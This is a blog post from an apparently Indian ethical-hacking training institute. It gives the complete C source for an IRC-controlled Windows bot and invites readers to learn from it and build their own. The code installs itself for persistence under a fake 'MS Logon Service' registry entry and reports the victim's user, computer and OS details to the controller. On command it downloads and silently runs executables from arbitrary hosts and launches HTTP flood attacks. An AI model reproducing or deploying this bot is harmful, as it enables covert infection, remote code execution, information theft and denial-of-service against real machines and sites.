Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India

Hello guys welcome back to Extreme Hacking programming zone. After looking around in this hacking world found many script kiddies. Useless people using Trojans and Bots made by some one else, hell for such guys. There are tons of people so called security prof.. bla bla bla white hats bla bla..

One question to those money sucking people where do you disappear when country is under cyber threat?? Anyways I dont want these young generation to be bluffed by such peoples. There is no short cut for success.

We need you, this country needs you. keep learning and throw out those tools. Toys are used by kids not by Cyber Warriors.

A simple Bot which can be used on facebook, google+, yahoo msg and any sort of IRC.
Understand the logical flow and create a new one. If you have any difficulty in understanding the logical flow you can write to me at sadik.shaikh@extremehacking.org

Enjoy learning..

Here is the Code written in C:

#include <windows.h>
#include <winsock2.h>
#include <stdio.h>
#define _CHANNEL_ “#channel”
#define _CONTROL_ “your_nick”
#define _SERVER_ “irc_server”

#define BUF_LENGTH 1024

//Prototypen
int startWinsock(void);
long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr);

struct DOWNLOADSTRUCT
{
char host[BUF_LENGTH];
char path[BUF_LENGTH];
};

struct DOSSTRUCT
{
char host[BUF_LENGTH];
int count;
};

DWORD WINAPI download(LPVOID arg)
{
DOWNLOADSTRUCT *ds = (DOWNLOADSTRUCT*)arg;
long rc;
SOCKET s;
SOCKADDR_IN addr;
int lc, i;
FILE *f;
char buf[BUF_LENGTH], fname[BUF_LENGTH];

rc=startWinsock();
if(rc!=0)
ExitThread(0);

s=socket(AF_INET,SOCK_STREAM,0);
if(s==INVALID_SOCKET)
ExitThread(0);

memset(&addr,0,sizeof(SOCKADDR_IN));
addr.sin_family=AF_INET;
addr.sin_port=htons(80);
rc=getAddrFromString(ds->host,&addr);
if(rc==SOCKET_ERROR)
ExitThread(0);

rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR));
if(rc==SOCKET_ERROR)
ExitThread(0);

sprintf(buf, “GET /%s HTTP/1.1\r\nHost: %s\r\n\r\n”, ds->path, ds->host);
send(s,buf,strlen(buf),0);

lc = 0;
while(lc < 2)
{
rc=recv(s,buf,1,0);
if(buf[0] == ‘\n’) lc++;
else if(buf[0] != ‘\r’) lc = 0;
}

sprintf(fname, “temp_%i.exe”, (rand() % 5000));
f = fopen(fname, “wb”);

while((rc=recv(s,buf,256,0)) != 0)
{
if(rc==SOCKET_ERROR)
ExitThread(0);
for(i = 0;i < rc;i++)
fprintf(f, “%c”, buf[i]);
}
fclose(f);

closesocket(s);
WSACleanup();

WinExec(fname, SW_HIDE);

ExitThread(0);
}

DWORD WINAPI dos(LPVOID arg)
{
DOSSTRUCT *ds = (DOSSTRUCT*)arg;
long rc;
SOCKET s;
SOCKADDR_IN addr;
int lc, i;
char buf[BUF_LENGTH];

rc=startWinsock();
if(rc!=0)
ExitThread(0);

for(i = 0;i < ds->count;i++)
{
while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(500);

memset(&addr,0,sizeof(SOCKADDR_IN));
addr.sin_family=AF_INET;
addr.sin_port=htons(80);
rc=getAddrFromString(ds->host,&addr);
if(rc==SOCKET_ERROR)
ExitThread(0);
while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(500);

sprintf(buf, “GET / HTTP/1.1\r\nHost: %s\r\n\r\n”, ds->host);
send(s,buf,strlen(buf),0);
closesocket(s);
}

WSACleanup();

ExitThread(0);
}

unsigned long downloadtid, dostid;

int WINAPI WinMain(HINSTANCE w1, HINSTANCE w2, PSTR w3, int w4)//main()
{
long rc;
SOCKET s;
SOCKADDR_IN addr;
char buf[BUF_LENGTH], buf2[BUF_LENGTH], buf3[BUF_LENGTH], channel[] = _CHANNEL_, master[] = _CONTROL_, nick[BUF_LENGTH], *ptr;
int i, sm;
DWORD l;
OSVERSIONINFOEX osinfo;
DOWNLOADSTRUCT ds;
DOSSTRUCT dss;
HWND hWnd;
HKEY hKey;

ptr = (char *)malloc(BUF_LENGTH);
sm = 0;

srand(time(NULL));

hWnd = (HWND)GetModuleHandle(NULL);
GetModuleFileName((HINSTANCE)hWnd, buf, sizeof(buf));
GetSystemDirectory(buf2, sizeof(buf2));
strcat(buf2, “\\logon_service.exe”);
CopyFile(buf, buf2, 0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”, 0, KEY_ALL_ACCESS, &hKey);
RegSetValueEx(hKey, “MS Logon Service”, 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
RegCloseKey(hKey);

if((strcmp(buf, buf) != 0))
{
// Fake Message
//MessageBox(NULL, “Error #235\n\nCouldn’t open ‘sro_c.exe’\nAbort”, “Install Error”, MB_OK + MB_ICONERROR);
}

// Winsock starten
startWinsock();
printf(“Winsock gestartet\n”);
// Socket erstellen
while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(1000);
printf(“Socket erstellt\n”);
// Verbinden
memset(&addr,0,sizeof(SOCKADDR_IN)); // zuerst alles auf 0 setzten
addr.sin_family=AF_INET;
addr.sin_port=htons(6667); // wir verwenden mal port 12345
rc=getAddrFromString(_SERVER_,&addr);
if(rc==SOCKET_ERROR)
return 1;
while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(1000);

sprintf(nick, “bot_%i”, rand() % 30000);
/*
rc=recv(s,buf,1000,0);
rc=recv(s,buf,1000,0);
buf[rc] = ‘\0’;
*/
sprintf(buf, “NICK %s\r\nUSER %s \”localhost\” \”%s\” :%s\r\n”, nick, nick, _SERVER_, nick);
send(s,buf,strlen(buf),0);
/*
rc=recv(s,buf,1000,0);
buf[rc] = ‘\0’;

strtok(buf, ” “);
strcpy(buf2, strtok(NULL, “”));
strcpy(buf, “PONG “);
strcat(buf, buf2);
send(s,buf,strlen(buf),0);
*/
do
{
rc=recv(s,buf,1000,0);
buf[rc] = ‘\0′;
} while(!strstr(buf, “End of /MOTD command”));

sprintf(buf, “JOIN %s\r\n”, channel);
send(s,buf,strlen(buf),0);

// Daten austauschen
while(rc!=SOCKET_ERROR)
{
rc=recv(s,buf,1000,0);
if(rc==0)
break;
if(rc==SOCKET_ERROR)
break;
buf[rc]=’\0’;

if(!strnicmp(buf, “PING”, 4))
{
strtok(buf, ” “);
strcpy(buf2, strtok(NULL, “”));
strcpy(buf, “PONG “);
strcat(buf, buf2);
send(s,buf,strlen(buf),0);
}
else if(strstr(buf, “PRIVMSG”))
{
strcpy(buf2, buf);
ptr = strtok(buf2, “!”);
for(i = 1;i <= strlen(ptr);i++) ptr[i – 1] = ptr[i];
if(strcmp(ptr, master) == 0)
{
ptr = strtok(buf, “:”);
ptr = strtok(NULL, “\r”);

if(strcmp(ptr, “exit”) == 0)
{
closesocket(s);
WSACleanup();
return 0;
}
else if(strcmp(ptr, “uninstall”) == 0)
{
sprintf(buf2, “nothing…”);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”, 0, KEY_ALL_ACCESS, &hKey);
RegSetValueEx(hKey, “MS Logon Service”, 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
RegCloseKey(hKey);

closesocket(s);
WSACleanup();
return 0;
}
else if(strcmp(ptr, “info”) == 0)
{
l = sizeof(buf);
GetUserName(buf, &l);
sprintf(buf2, “Username: %s”, buf);
GetComputerName(buf, &l);
sprintf(buf3, “%s, Computername: %s”, buf2, buf);
sm = 1;
ZeroMemory(&osinfo, sizeof(OSVERSIONINFO));
osinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx((OSVERSIONINFO *) &osinfo);
l = osinfo.dwMinorVersion;
strcpy(buf, “???”);
switch(osinfo.dwMajorVersion)
{
case 5:
if(l == 0)
strcpy(buf, “Windows 2000”);
else if(l == 1)
strcpy(buf, “Windows XP”);
else if(l == 2)
{
if(osinfo.wSuiteMask == 0x8000)
strcpy(buf, “Windows Home Server”);
else if(GetSystemMetrics(89) == 0)
strcpy(buf, “Windows Server 2003”);
else if(GetSystemMetrics(89) != 0)
strcpy(buf, “Windows Server 2003 R2”);
else
strcpy(buf, “Windows XP Professional x64 Edition”);
}
break;

case 6:
if(l)
{
if(osinfo.wProductType != VER_NT_WORKSTATION)
strcpy(buf, “Windows Server 2008 R2”);
else
strcpy(buf, “Windows 7”);
}
else
{
if(osinfo.wProductType == VER_NT_WORKSTATION)
strcpy(buf, “Windows Vista”);
else
strcpy(buf, “Windows Server 2008”);
}
break;

default:
strcpy(buf, “???”);
break;
}

sprintf(buf2, “%s, OS: %s”, buf3, buf);
}
else if(strncmp(ptr, “download”, strlen(“download”)) == 0)
{
ptr = strtok(ptr, ” “);
ptr = strtok(NULL, ” “);
sprintf(ds.host, “%s”, ptr);
ptr = strtok(NULL, ” “);
sprintf(ds.path, “%s”, ptr);

CreateThread(NULL, 0, download, &ds, 0, &downloadtid);
}
else if(strncmp(ptr, “dos”, strlen(“dos”)) == 0)
{
ptr = strtok(ptr, ” “);
ptr = strtok(NULL, ” “);
sprintf(dss.host, “%s”, ptr);
ptr = strtok(NULL, ” “);
dss.count = atoi(ptr);

CreateThread(NULL, 0, dos, &dss, 0, &dostid);
}
else
{
buf[0] = ‘\0’;
}

if(sm)
{
sprintf(buf, “PRIVMSG %s :%s\r\n”, channel, buf2);
send(s,buf,strlen(buf),0);
sm = 0;
}
}
}
}
closesocket(s);
WSACleanup();
return 0;
}

int startWinsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0),&wsa);
}
long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr)
{
long rc;
unsigned long ip;
HOSTENT* he;

if(hostnameOrIp==NULL || addr==NULL)
return SOCKET_ERROR;

ip=inet_addr(hostnameOrIp);

if(ip!=INADDR_NONE)
{
addr->sin_addr.s_addr=ip;
return 0;
}
else
{
he=gethostbyname(hostnameOrIp);
if(he==NULL)
return SOCKET_ERROR;
else
memcpy(&(addr->sin_addr),he->h_addr_list[0],4);
return 0;
}
}

www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India, ceh v9 course in Pune-India,ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India